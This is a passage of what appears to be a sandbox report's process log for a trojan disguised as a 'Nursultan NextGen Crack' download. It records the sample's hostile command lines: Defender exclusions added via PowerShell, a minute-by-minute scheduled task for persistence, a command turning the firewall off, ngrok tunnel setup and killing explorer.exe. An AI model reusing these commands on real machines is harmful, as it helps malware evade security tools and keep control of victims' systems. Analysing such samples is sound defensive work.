PID 32 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\и.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\choice.exe

choice /c 12 /n /m "Enter your choice:"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\wininit'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\Admin\wininit"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.0.275924726\917746860" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f0142e1-51f5-4ec3-9240-3e5e170c2355} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 1832 2df908c2858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.1.146440821\700021077" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88228470-3a94-48c2-b42f-cd6066af08aa} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 2356 2df84785358 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.2.174747166\75368795" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c50e683e-16a6-4807-8b63-45b3edac4281} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 2932 2df90490858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.3.1045039126\2053172858" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 2640 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0828b270-9068-404c-922d-c0873986b2aa} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 3576 2df96e88e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.4.956959532\118798927" -childID 3 -isForBrowser -prefsHandle 5072 -prefMapHandle 5140 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e46252ef-72b1-476d-bb54-b84fc28aa8df} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5116 2df986fd958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.5.1044836342\55105560" -childID 4 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff55e700-1976-4735-a9f5-a3e9997cdceb} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5296 2df995d4058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.6.195823850\321816344" -childID 5 -isForBrowser -prefsHandle 5500 -prefMapHandle 5508 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3070917a-f0f1-41f9-840e-35d48d427941} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 5492 2df995d5558 tab

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicePickerUserSvc

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} -Embedding

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbde65ab58,0x7ffbde65ab68,0x7ffbde65ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4220 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4204 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\system32\DisplaySwitch.exe

DisplaySwitch.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /im ngrok.exe /f

C:\Users\Admin\AppData\Local\Temp\ngrok.exe

"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 123

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:8

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3248 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:2

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C0

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1904.7.1851671827\701759316" -childID 6 -isForBrowser -prefsHandle 2792 -prefMapHandle 3460 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 1356 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1df09990-1432-4313-a635-c2059cb27809} 1904 "\\.\pipe\gecko-crash-server-pipe.1904" 4028 2df93bc0e58 tab

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.0.875357676\303355245" -parentBuildID 20230214051806 -prefsHandle 1708 -prefMapHandle 1700 -prefsLen 22484 -prefMapSize 235208 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93fc92f8-cbb9-4b24-bee8-777acb20e8d9} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 1608 1ef07922f58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.1.1069390618\1963344058" -parentBuildID 20230214051806 -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 22484 -prefMapSize 235208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2970c55d-932a-4d23-919e-f7a587a32025} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 2232 1ef7b88a558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.2.941851982\615664076" -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 3036 -prefsLen 22880 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cdd5409-6d6f-4469-92cd-90d1d85fca3b} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 2684 1ef0ba0ff58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.3.81376150\1612812879" -childID 2 -isForBrowser -prefsHandle 3496 -prefMapHandle 3492 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3a21f2-9a72-4aa5-8755-53d11ea2a0aa} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 3504 1ef0dce6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.4.45621807\671645759" -childID 3 -isForBrowser -prefsHandle 5024 -prefMapHandle 5020 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a59a5da-b104-4d53-93b6-b014ab6575ef} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5040 1ef0fa7fe58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.5.600051033\1718866529" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6484e38d-8cb9-4fc1-831c-68f6f3af92ab} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5160 1ef10416858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.6.551616193\149894371" -childID 5 -isForBrowser -prefsHandle 5448 -prefMapHandle 5444 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a25afb83-826c-4a83-895c-942200efa723} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5456 1ef104c7658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.7.912271151\633927157" -childID 6 -isForBrowser -prefsHandle 5784 -prefMapHandle 5780 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c24ecb8-16db-40d4-994d-502de461cb3f} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5796 1ef11c18b58 tab

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /I{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 0C93C95AA9B3BF6000ACEC914446538C C

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding A4D5730D607D76DDADAA17EE79C5FE17 C

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 310125655B2F474F23CB7EC4DCD9D7AE C

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.8.1573044007\100775569" -childID 7 -isForBrowser -prefsHandle 5040 -prefMapHandle 5036 -prefsLen 28346 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {311fdcdc-bbe3-4852-93d5-73d4996f42fc} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5976 1ef11910e58 tab

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding DC06E923884A576777AA1E132CB348BE

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.9.2043715575\431917272" -childID 8 -isForBrowser -prefsHandle 5044 -prefMapHandle 5592 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ad75d3f-f144-4516-a0d4-7d3da1d8e175} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 5412 1ef11c17058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.10.793236605\301440004" -childID 9 -isForBrowser -prefsHandle 6196 -prefMapHandle 6200 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a563a5d-c25e-46dd-ba6f-497ba25cd0bd} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 6184 1ef12467e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5136.11.1801255500\1584993984" -childID 10 -isForBrowser -prefsHandle 6472 -prefMapHandle 6468 -prefsLen 28355 -prefMapSize 235208 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {374b3ad8-02ac-4ab0-a3c6-34957b555433} 5136 "\\.\pipe\gecko-crash-server-pipe.5136" 6480 1ef0f41fe58 tab

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\Downloads\aida64extreme730.exe

"C:\Users\Admin\Downloads\aida64extreme730.exe"

C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp" /SL5="$30174,51859982,56832,C:\Users\Admin\Downloads\aida64extreme730.exe"

C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe

"C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe"

C:\Windows\System32\ie4uinit.exe

"C:\Windows\System32\ie4uinit.exe" -ClearIconCache

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4460 --field-trial-handle=1972,i,4559477141036434237,3454111153606035002,131072 /prefetch:1

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Program Files\Google\Chrome\Application\chrome.exe

